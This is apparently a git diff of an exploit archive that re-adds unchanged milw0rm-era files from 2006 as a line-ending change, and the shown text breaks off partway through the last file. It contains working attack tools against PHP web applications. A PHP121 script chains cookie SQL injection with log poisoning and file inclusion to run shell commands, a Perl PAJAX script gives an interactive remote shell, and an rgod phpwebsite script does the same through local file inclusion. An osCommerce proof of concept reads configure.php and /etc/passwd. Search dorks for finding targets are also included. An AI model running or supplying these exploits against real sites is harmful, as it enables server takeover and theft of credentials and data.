-"../../../../../../../../../../etc/httpd/logs/error.log",
-"../../../../../../../../../../var/www/logs/access_log",
-"../../../../../../../../../../var/www/logs/access.log",
-"../../../../../../../../../../usr/local/apache/logs/access_log",
-"../../../../../../../../../../usr/local/apache/logs/access.log",
-"../../../../../../../../../../var/log/apache/access_log",
-"../../../../../../../../../../var/log/apache/access.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/www/logs/error_log",
-"../../../../../../../../../../var/www/logs/error.log",
-"../../../../../../../../../../usr/local/apache/logs/error_log",
-"../../../../../../../../../../usr/local/apache/logs/error.log",
-"../../../../../../../../../../var/log/apache/error_log",
-"../../../../../../../../../../var/log/apache/error.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/log/error_log"
-);
-
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-  $a=$i+2;
-  echo "[".$a."] Trying with: ".$paths[$i]."%00\r\n";
-  $sql="'UNION SELECT '".$paths[$i].chr(0x00)."' FROM php121_users/*";
-  $sql=urlencode($sql);
-  $packet ="GET ".$p."php121login.php HTTP/1.0\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Cookie: php121un=".$sql."; php121pw=suntzu;\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  #debug
-  #echo quick_dump($packet);
-  sendpacketii($packet);
-
-  $temp=explode("Set-Cookie: ",$html);
-  $temp2=explode(" ",$temp[1]);
-  $cookie=$temp2[0];
-  echo "Cookie -> ".$cookie."\r\n\r\n";
-  if ($cookie=='') {
-  echo $html;
-  die("Something goes wrong...\r\n");
-  }
-
-  $packet ="GET ".$p."php121language.php HTTP/1.0\r\n";
-  $packet.="User-Agent: GoogleBot/2.1\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Cookie: ".$cookie."; cmd=".$cmd.";\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  #debug
-  #echo quick_dump($packet);
-  sendpacketii($packet);
-  if (strstr($html,"56789"))
-  {
-    echo "Exploit succeeded...\r\n";
-    $temp=explode("56789",$html);
-    echo $temp[1];
-    die;
-  }
-}
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-04-12]
+#!/usr/bin/php -q -d short_open_tag=on
+ works with magic_quotes_gpc = Off\r\n\r\n";
+echo "a dork: inurl:php121login.php | inurl:php121im.php | intitle:\"PHP121 - PLEASE\"\r\n\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to PHP121\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /php121/ cat php121config.php\r\n";
+echo "php ".$argv[0]." localhost /php121/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
+die;
+}
+
+/*
+ software site: http://www.php121.com/
+ description: "PHP121 is a free web based instant messenger - written entirely in
+ PHP"
+
+ i)  vulnerable code in php121login.php and in nearly all files:
+
+  ...
+  if (isset($_COOKIE['php121un']) && isset($_COOKIE['php121pw'])) {
+        $logindataun = $_COOKIE['php121un'];
+        $logindatapw = $_COOKIE['php121pw'];
+        if (!empty($logindataun) && !empty($logindatapw)) {
+                //we have a cookie - use it to login, overriding any sessions
+                $_SESSION[sess_username]=$logindataun;
+                $_SESSION[sess_password]=$logindatapw;
+        }
+}
+
+$sess_username=$_SESSION[sess_username];
+$sess_password=$_SESSION[sess_password];
+  ...
+
+  in php121language.php we have:
+
+...
+$sess_username=$_SESSION[sess_username];
+$sess_password=$_SESSION[sess_password];
+// are we logged in?
+
+if ($sess_username!="") {
+
+	// get our language preference
+	$sql="select $dbf_language from $db_usertable where $dbf_uname='$sess_username'";
+	echo "sql: ".$sql."\r\n";
+	$row=mysql_fetch_row(mysql_query($sql));
+	if ($row[0]!="") {
+	require_once("language/lang-".strtolower($row[0]).".php");
+
+	}
+
+} else {
+
+	// use the default language file
+	require_once("language/lang-".strtolower($php121_config['default_language']).".php");
+
+}
+...
+
+ "sess_username" value is not sanitized before to be used in our query
+ so, if magic_quotes_gpc = Off, we can include arbitrary files from local
+ resources, poc:
+
+  GET /php121login.php HTTP/1.0
+  Host: somehost
+  Cookie: php121un=%27UNION+SELECT+%27..%2F..%2F..%2Fetc%2Fpasswd%00%27+FROM+php121_users%2F%2A; php121pw=suntzu;
+  Connection: Close
+
+ now session cookie is poisoned, and we can go to php121language.php
+ with our new cookie to see/include local resources, query becomes:
+
+ select php121_language from php121_users where uname=''UNION SELECT '../../../etc/passwd[null char]' FROM php121_users/*'
+
+ php121_language field is varchar(30) so, before MySQL 4.1.1,
+ your path is limited to 29 chars (so, it is nearly impossible
+ submit a valid inclusion path), with Mysql >=4.1.1 it does not matter,
+ path is not truncated anymore at the length of the first select field
+
+ we can also try  blind injection, injecting a shell:
+
+  GET /php121login.php HTTP/1.0
+  Host: somehost
+  Cookie: php121un=%27UNION+SELECT+%27%3C%3Fphp+system%28%24_GET%5Bcmd%5D%29%3B%3F%3E%27+INTO+DUMPFILE+%27somefile%27+FROM+php121_users%2F%2A; php121pw=suntzu;
+  Connection: Close
+
+ and now go to php121language.php to write our file, if MySQL have certain rigths
+ to do it
+
+ you can do the work trough a browser like Opera that allows to edit cookies
+
+ However, this exploit inject some code in log files and try to include them
+
+					                                      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "[1] Injecting some code in log files ...\r\n\r\n";
+$CODE="";
+$packet="GET ".$p.$CODE." HTTP/1.0\r\n";
+$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: close\r\n\r\n";
+sendpacketii($packet);
+sleep(1);
+
+$paths=array(
+"../../../../../../../../../../var/log/httpd/access_log",
+"../../../../../../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../../../../../../apache/logs/error.log",
+"../../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
+"../../../logs/error.log",
+"../../../logs/access.log",
+"../../../../logs/error.log",
+"../../../../logs/access.log",
+"../../../../../logs/error.log",
+"../../../../../logs/access.log",
+"../../../../../../logs/error.log",
+"../../../../../../logs/access.log",
+"../../../../../../../../../../etc/httpd/logs/acces_log",
+"../../../../../../../../../../etc/httpd/logs/acces.log",
+"../../../../../../../../../../etc/httpd/logs/error_log",
+"../../../../../../../../../../etc/httpd/logs/error.log",
+"../../../../../../../../../../var/www/logs/access_log",
+"../../../../../../../../../../var/www/logs/access.log",
+"../../../../../../../../../../usr/local/apache/logs/access_log",
+"../../../../../../../../../../usr/local/apache/logs/access.log",
+"../../../../../../../../../../var/log/apache/access_log",
+"../../../../../../../../../../var/log/apache/access.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/www/logs/error_log",
+"../../../../../../../../../../var/www/logs/error.log",
+"../../../../../../../../../../usr/local/apache/logs/error_log",
+"../../../../../../../../../../usr/local/apache/logs/error.log",
+"../../../../../../../../../../var/log/apache/error_log",
+"../../../../../../../../../../var/log/apache/error.log",
+"../../../../../../../../../../var/log/access_log",
+"../../../../../../../../../../var/log/error_log"
+);
+
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+  $a=$i+2;
+  echo "[".$a."] Trying with: ".$paths[$i]."%00\r\n";
+  $sql="'UNION SELECT '".$paths[$i].chr(0x00)."' FROM php121_users/*";
+  $sql=urlencode($sql);
+  $packet ="GET ".$p."php121login.php HTTP/1.0\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Cookie: php121un=".$sql."; php121pw=suntzu;\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  #debug
+  #echo quick_dump($packet);
+  sendpacketii($packet);
+
+  $temp=explode("Set-Cookie: ",$html);
+  $temp2=explode(" ",$temp[1]);
+  $cookie=$temp2[0];
+  echo "Cookie -> ".$cookie."\r\n\r\n";
+  if ($cookie=='') {
+  echo $html;
+  die("Something goes wrong...\r\n");
+  }
+
+  $packet ="GET ".$p."php121language.php HTTP/1.0\r\n";
+  $packet.="User-Agent: GoogleBot/2.1\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Cookie: ".$cookie."; cmd=".$cmd.";\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  #debug
+  #echo quick_dump($packet);
+  sendpacketii($packet);
+  if (strstr($html,"56789"))
+  {
+    echo "Exploit succeeded...\r\n";
+    $temp=explode("56789",$html);
+    echo $temp[1];
+    die;
+  }
+}
+//if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-04-12]
diff --git a/platforms/php/webapps/1668.php b/platforms/php/webapps/1668.php
index e07b9b742..04e782f37 100755
--- a/platforms/php/webapps/1668.php
+++ b/platforms/php/webapps/1668.php
@@ -1,62 +1,62 @@
-"
-     ."turl:

    "
-     ."hurl:

    "
-     ."cmd:

    "
-     .""
-
-     ."
    ";
-
-if (!isset($_POST['submit']))
-{
-
-echo $form;
-
-}else{
-
-$file = fopen ("test.txt", "w+");
-
-fwrite($file, "");
-fclose($file);
-
-$file = fopen ($turl.$hurl, "r");
-if (!$file) {
-     echo "
    Unable to get output.\n";
-     exit;
-}
-
-echo $form;
-
-while (!feof ($file)) {
-     $line .= fgets ($file, 1024)."
    ";
-     }
-$tpos1 = strpos($line, "++BEGIN++");
-$tpos2 = strpos($line, "++END++");
-$tpos1 = $tpos1+strlen("++BEGIN++");
-$tpos2 = $tpos2-$tpos1;
-$output = substr($line, $tpos1, $tpos2);
-echo $output;
-
-}
-?>
-
-# milw0rm.com [2006-04-13]
+"
+     ."turl:

    "
+     ."hurl:

    "
+     ."cmd:

    "
+     .""
+
+     ."
    ";
+
+if (!isset($_POST['submit']))
+{
+
+echo $form;
+
+}else{
+
+$file = fopen ("test.txt", "w+");
+
+fwrite($file, "");
+fclose($file);
+
+$file = fopen ($turl.$hurl, "r");
+if (!$file) {
+     echo "
    Unable to get output.\n";
+     exit;
+}
+
+echo $form;
+
+while (!feof ($file)) {
+     $line .= fgets ($file, 1024)."
    ";
+     }
+$tpos1 = strpos($line, "++BEGIN++");
+$tpos2 = strpos($line, "++END++");
+$tpos1 = $tpos1+strlen("++BEGIN++");
+$tpos2 = $tpos2-$tpos1;
+$output = substr($line, $tpos1, $tpos2);
+echo $output;
+
+}
+?>
+
+# milw0rm.com [2006-04-13]
diff --git a/platforms/php/webapps/1672.pl b/platforms/php/webapps/1672.pl
index 4fd936785..692357e76 100755
--- a/platforms/php/webapps/1672.pl
+++ b/platforms/php/webapps/1672.pl
@@ -1,37 +1,37 @@
-#!/usr/bin/perl
-
-use IO::Socket;
-
-print "PAJAX Remote Code Injection - code by: Stoney - exploit found
-by: RedTeam\n";
-
-if ($ARGV[0] && $ARGV[1])
-{
- $host = $ARGV[0];
- $path = $ARGV[1];
- $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
-PeerPort => "80") || die "connecterror\n";
- while (1) {
-   print '['.$host.']# ';
-   $cmd = ;
-   chop($cmd);
-   last if ($cmd eq 'exit');
-   $ajaxdata = "{\"id\": \"bb2238f1186dad8d6370d2bab5f290f71\", \"className\": \"Calculator\", \"method\": \"add(1,1);system($cmd);\$obj->add\", \"params\": [\"1\", \"5\"]}";
-
-   print $sock "POST ".$path." HTTP/1.1\n";
-   print $sock "Host: ".$host."\n";
-   print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
-   print $sock "Content-Type: text/json\n";
-   print $sock "Content-Length:".length($ajaxdata)."\n\n".$ajaxdata;
-   while ($ans = <$sock>)
-      {
-       print "$ans";
-      }
-  }
- }
-else {
- print "Usage: perl ajax.pl [host] [path_to_ajax]\n\n";
-exit;
-}
-
-# milw0rm.com [2006-04-13]
+#!/usr/bin/perl
+
+use IO::Socket;
+
+print "PAJAX Remote Code Injection - code by: Stoney - exploit found
+by: RedTeam\n";
+
+if ($ARGV[0] && $ARGV[1])
+{
+ $host = $ARGV[0];
+ $path = $ARGV[1];
+ $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
+PeerPort => "80") || die "connecterror\n";
+ while (1) {
+   print '['.$host.']# ';
+   $cmd = ;
+   chop($cmd);
+   last if ($cmd eq 'exit');
+   $ajaxdata = "{\"id\": \"bb2238f1186dad8d6370d2bab5f290f71\", \"className\": \"Calculator\", \"method\": \"add(1,1);system($cmd);\$obj->add\", \"params\": [\"1\", \"5\"]}";
+
+   print $sock "POST ".$path." HTTP/1.1\n";
+   print $sock "Host: ".$host."\n";
+   print $sock "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7";
+   print $sock "Content-Type: text/json\n";
+   print $sock "Content-Length:".length($ajaxdata)."\n\n".$ajaxdata;
+   while ($ans = <$sock>)
+      {
+       print "$ans";
+      }
+  }
+ }
+else {
+ print "Usage: perl ajax.pl [host] [path_to_ajax]\n\n";
+exit;
+}
+
+# milw0rm.com [2006-04-13]
diff --git a/platforms/php/webapps/1673.php b/platforms/php/webapps/1673.php
index d1f275ccd..aa84385af 100755
--- a/platforms/php/webapps/1673.php
+++ b/platforms/php/webapps/1673.php
@@ -1,221 +1,221 @@
-#!/usr/bin/php -q -d short_open_tag=on
- arbitrary local inclusion, works with magic_quotes_gpc = Off\r\n";
-echo "by rgod, mail: rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to phpwebsite\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /phpwebsite/ ls -la\r\n";
-die;
-}
-
-/* explaination:
- vulnerable code in index.php at lines 21-29:
-
-...
- if (!isset($hub_dir)) {
-    $hub_dir = NULL;
-}
-if (!preg_match ("/:\/\//i", $hub_dir)) {
-    loadConfig($hub_dir);
-} else {
-    exit('FATAL ERROR! Hub directory was malformed.');
-}
-...
-
-and at lines 125-143:
-
-...
-function loadConfig($hub_dir){
-
-    if (file_exists($hub_dir . 'conf/config.php')) {
- 	if (filesize($hub_dir . 'conf/config.php') > 0) {
-	    include($hub_dir . 'conf/config.php');
-
-	    define('PHPWS_SOURCE_DIR', $source_dir);
-
-
-	} else {
-
-	    header('Location: ./setup/set_config.php');
-	    exit();
-	}
-    } else {
-	header('Location: ./setup/set_config.php');
-	exit();
-    }
-}
-....
-
-so, you can include files from local resources, poc:
-
-http://[target]/[path]/index.php?hub_dir=/var/log/httpd/access_log%00
-
-you don't see output, but we have some code in log files, it will be executed
-
-also, on php5, arbitrary remote inclusion:
-
-http://[target]/[path]/index.php?hub_dir=\\192.168.1.3\c\
-
-including a full accessible share
-where on samba resource you have some code in conf/config.php
-									      */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-    $c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-    }
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "[1] Injecting some code in log files...\r\n";
-$CODE ='';
-$packet.="GET ".$path.$CODE." HTTP/1.1\r\n";
-$packet.="User-Agent: ".$CODE."\r\n";
-$packet.="Host: ".$serv."\r\n";
-$packet.="Connection: close\r\n\r\n";
-#debug
-#echo quick_dump($packet);
-sendpacketii($packet);
-sleep(2);
-
-# fill with possible locations
-$paths= array (
-  "/var/log/httpd/access_log",
-  "/var/log/httpd/error_log",
-  "../apache/logs/error.log",
-  "../apache/logs/access.log",
-  "../../apache/logs/error.log",
-  "../../apache/logs/access.log",
-  "../../../apache/logs/error.log",
-  "../../../apache/logs/access.log",
-  "../../../../apache/logs/error.log",
-  "../../../../apache/logs/access.log",
-  "/etc/httpd/logs/acces_log",
-  "/etc/httpd/logs/acces.log",
-  "/etc/httpd/logs/error_log",
-  "/etc/httpd/logs/error.log",
-  "/var/www/logs/access_log",
-  "/var/www/logs/access.log",
-  "/usr/local/apache/logs/access_log",
-  "/usr/local/apache/logs/access.log",
-  "/var/log/apache/access_log",
-  "/var/log/apache/access.log",
-  "/var/log/access_log",
-  "/var/www/logs/error_log",
-  "/www/logs/error.log",
-  "/usr/local/apache/logs/error_log",
-  "/usr/local/apache/logs/error.log",
-  "/var/log/apache/error_log",
-  "/var/log/apache/error.log",
-  "/var/log/access_log",
-  "/var/log/error_log",
-);
-
-for ($i=0; $i<=count($paths)-1; $i++)
-{
-  $j=$i+2;
-  echo "[".$j."] Trying with ".$paths[$i]."%00\r\n";
-  $xpl=$paths[$i];
-  $packet ="GET ".$p."index.php?cmd=".$cmd."&hub_dir=".$xpl."%00 HTTP/1.0\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  #debug, shows packets in a nice format
-  #echo quick_dump($packet);
-  sendpacketii($packet);
-  if (strstr($html,"666")){
-    echo "Exploit succeeded...\r\n";
-    $temp=explode("666",$html);
-    echo $temp[1];
-    die;
-  }
-}
-#if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-04-14]
+#!/usr/bin/php -q -d short_open_tag=on
+ arbitrary local inclusion, works with magic_quotes_gpc = Off\r\n";
+echo "by rgod, mail: rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to phpwebsite\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /phpwebsite/ ls -la\r\n";
+die;
+}
+
+/* explaination:
+ vulnerable code in index.php at lines 21-29:
+
+...
+ if (!isset($hub_dir)) {
+    $hub_dir = NULL;
+}
+if (!preg_match ("/:\/\//i", $hub_dir)) {
+    loadConfig($hub_dir);
+} else {
+    exit('FATAL ERROR! Hub directory was malformed.');
+}
+...
+
+and at lines 125-143:
+
+...
+function loadConfig($hub_dir){
+
+    if (file_exists($hub_dir . 'conf/config.php')) {
+ 	if (filesize($hub_dir . 'conf/config.php') > 0) {
+	    include($hub_dir . 'conf/config.php');
+
+	    define('PHPWS_SOURCE_DIR', $source_dir);
+
+
+	} else {
+
+	    header('Location: ./setup/set_config.php');
+	    exit();
+	}
+    } else {
+	header('Location: ./setup/set_config.php');
+	exit();
+    }
+}
+....
+
+so, you can include files from local resources, poc:
+
+http://[target]/[path]/index.php?hub_dir=/var/log/httpd/access_log%00
+
+you don't see output, but we have some code in log files, it will be executed
+
+also, on php5, arbitrary remote inclusion:
+
+http://[target]/[path]/index.php?hub_dir=\\192.168.1.3\c\
+
+including a full accessible share
+where on samba resource you have some code in conf/config.php
+									      */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+    $c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+    }
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "[1] Injecting some code in log files...\r\n";
+$CODE ='';
+$packet.="GET ".$path.$CODE." HTTP/1.1\r\n";
+$packet.="User-Agent: ".$CODE."\r\n";
+$packet.="Host: ".$serv."\r\n";
+$packet.="Connection: close\r\n\r\n";
+#debug
+#echo quick_dump($packet);
+sendpacketii($packet);
+sleep(2);
+
+# fill with possible locations
+$paths= array (
+  "/var/log/httpd/access_log",
+  "/var/log/httpd/error_log",
+  "../apache/logs/error.log",
+  "../apache/logs/access.log",
+  "../../apache/logs/error.log",
+  "../../apache/logs/access.log",
+  "../../../apache/logs/error.log",
+  "../../../apache/logs/access.log",
+  "../../../../apache/logs/error.log",
+  "../../../../apache/logs/access.log",
+  "/etc/httpd/logs/acces_log",
+  "/etc/httpd/logs/acces.log",
+  "/etc/httpd/logs/error_log",
+  "/etc/httpd/logs/error.log",
+  "/var/www/logs/access_log",
+  "/var/www/logs/access.log",
+  "/usr/local/apache/logs/access_log",
+  "/usr/local/apache/logs/access.log",
+  "/var/log/apache/access_log",
+  "/var/log/apache/access.log",
+  "/var/log/access_log",
+  "/var/www/logs/error_log",
+  "/www/logs/error.log",
+  "/usr/local/apache/logs/error_log",
+  "/usr/local/apache/logs/error.log",
+  "/var/log/apache/error_log",
+  "/var/log/apache/error.log",
+  "/var/log/access_log",
+  "/var/log/error_log",
+);
+
+for ($i=0; $i<=count($paths)-1; $i++)
+{
+  $j=$i+2;
+  echo "[".$j."] Trying with ".$paths[$i]."%00\r\n";
+  $xpl=$paths[$i];
+  $packet ="GET ".$p."index.php?cmd=".$cmd."&hub_dir=".$xpl."%00 HTTP/1.0\r\n";
+  $packet.="Host: ".$host."\r\n";
+  $packet.="Connection: Close\r\n\r\n";
+  #debug, shows packets in a nice format
+  #echo quick_dump($packet);
+  sendpacketii($packet);
+  if (strstr($html,"666")){
+    echo "Exploit succeeded...\r\n";
+    $temp=explode("666",$html);
+    echo $temp[1];
+    die;
+  }
+}
+#if you are here...
+echo "Exploit failed...";
+?>
+
+# milw0rm.com [2006-04-14]
diff --git a/platforms/php/webapps/1674.txt b/platforms/php/webapps/1674.txt
index 9154fea3d..e976e54bb 100755
--- a/platforms/php/webapps/1674.txt
+++ b/platforms/php/webapps/1674.txt
@@ -1,50 +1,50 @@
----- osCommerce <= 2.2 "extras/" information/source code disclosure ------------
-
-software site: http://www.oscommerce.com/
-
-
-if extras/ folder is placed inside the www path, you can see all files on target
-system, including php source code with database details, poc:
-
-http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
-http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd
-
-this is the vulnerable code in update.php:
-
-...
-	include '../mysql.php';
-	// if a readme.txt file exists, display it to the user
-	if(!$read_me) {
-		if(file_exists('readme.txt')) {
-			$readme_file = 'readme.txt';
-		}
-		elseif(file_exists('README')) {
-			$readme_file = 'README';
-		}
-		elseif(file_exists('readme')) {
-			$readme_file = 'readme';
-		}
-		if($readme_file) {
-			$readme = file($readme_file);
-			print "
    \n";
-			print nl2br(htmlentities(implode($readme, ' ')));
-			print "
    Continue
    \n";
-			print "
    \n";
-			exit;
-		}
-	}
-...
-
-google search:
-
